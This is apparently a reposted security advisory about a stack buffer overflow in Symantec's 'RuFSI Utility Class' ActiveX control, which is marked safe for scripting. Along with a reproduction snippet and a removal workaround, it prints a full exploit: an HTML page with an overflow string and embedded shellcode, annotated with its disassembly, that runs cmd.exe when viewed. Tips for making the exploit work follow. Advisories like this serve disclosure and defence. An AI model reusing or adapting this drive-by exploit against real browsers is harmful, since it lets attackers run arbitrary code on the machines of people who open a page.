‘Symantec Security Check Service ActiveX Buffer Overflow’

Summary

‘Symantec has a free online service for virus and security scan called Symantec Security Check.
To access this service a user must go to http://www.symantec.com/securitycheck/ and then select what kind of scan want to run. In order to run scans ActiveX controls are installed in user’s computer. The ActiveX control has been found to contain an exploitable buffer overflow.’

Credit:

‘The information has been provided by Cesar, the epxloit code was provided by SecurITeam Experts.’


Details

‘One of the installed ActiveX controls is called ‘Symantec RuFSI Utility Class’ and it has this description: ‘Norton Internet Security Registry and File Information’, there isn’t documentation on what it does but it looks like it’s used to collect user’s computer information in order to perform the scans. If a long string is passed in any of the parameters of CompareVersionStrings method a stack based overflow occurs when the method is executed.

To reproduce the overflow just cut-and-paste the following:
< object classid=’clsid:69DEAF94-AF66-11D3-BEC0-00105AA9B6AE’ id=’test’>
</object>

< script>
test.CompareVersionStrings(‘long string here’,’or long string here’)
</script>

This ActiveX control is marked as safe, so the above sample will run without being blocked in default Internet Explorer security configuration. This vulnerability can be exploited to run arbitrary code.

Workaround:
Go to %SystemRoot%Downloaded Program Files and remove ‘Symantec RuFSI Utility Class’.

Exploit code:
SecurITeam has built an example exploit code that is able to run the cmd.exe whenever the below HTML is viewed (Note it has been hard coded to work with Windows 2000 and Internet Explorer 5.5):
<html>
<body>
< object classid=’clsid:69DEAF94-AF66-11D3-BEC0-00105AA9B6AE’ id=’test’>
</object>

< script language=javascript>
test.CompareVersionStrings(‘AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB
CDE’, ‘Ì‹ìU‹ì3ÿWē ÆEøcÆEùmÆEúdÆEû.ÆEüeÆEýxÆEþe¸Ã¯ xPEøPÿUô_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlÈ
‘)
</script>
</body>
</html>

<!– x90 – NOP
xCC – INT3
x90 – NOP
x90 – NOP
x90 – NOP
x90 – NOP
x8BxEC – MOV EBP, ESP
x55 – PUSH EBP
x8BxEC – MOV EBP, ESP
x33xFF – XOR EDI, EDI
x57 – PUSH EDI
x83xECx04 0 SUB ESP, 4
xC6x45xF8x63 – MOV BYTE PTR SS:[EBP-8],63h
xC6x45xF9x6D – MOV BYTE PTR SS:[EBP-7],6Dh
xC6x45xFAx64 – MOV BYTE PTR SS:[EBP-6],64h
xC6x45xFBx2E – MOV BYTE PTR SS:[EBP-5],2Eh
xC6x45xFCx65 – MOV BYTE PTR SS:[EBP-4],65h
xC6x45xFDx78 – MOV BYTE PTR SS:[EBP-3],78h
xC6x45xFEx65 – MOV BYTE PTR SS:[EBP-2],65h
xB8xC3xAFx01x78 – MOV EAX, MSVCRT.system
x50 – PUSH EAX
x8Dx45xF8 – LEA EAX, DWORD PTR SS:[EBP-8]
x50 – PUSH EAX
xFFx55xF4 – CALL DWORD PTR SS:[EBP-C]
x5F – POP EDI
–>

Notes:
A few things you should notice if you can’t get it to work:
1) Make sure the MDM.exe (Machine Debug Manager) is not running as it places the user buffer in places we didn’t plan it to jump to.
2) Make sure there is only ONE instance of iexplore.exe running, as each one has a different buffer area.’

Categories: Windows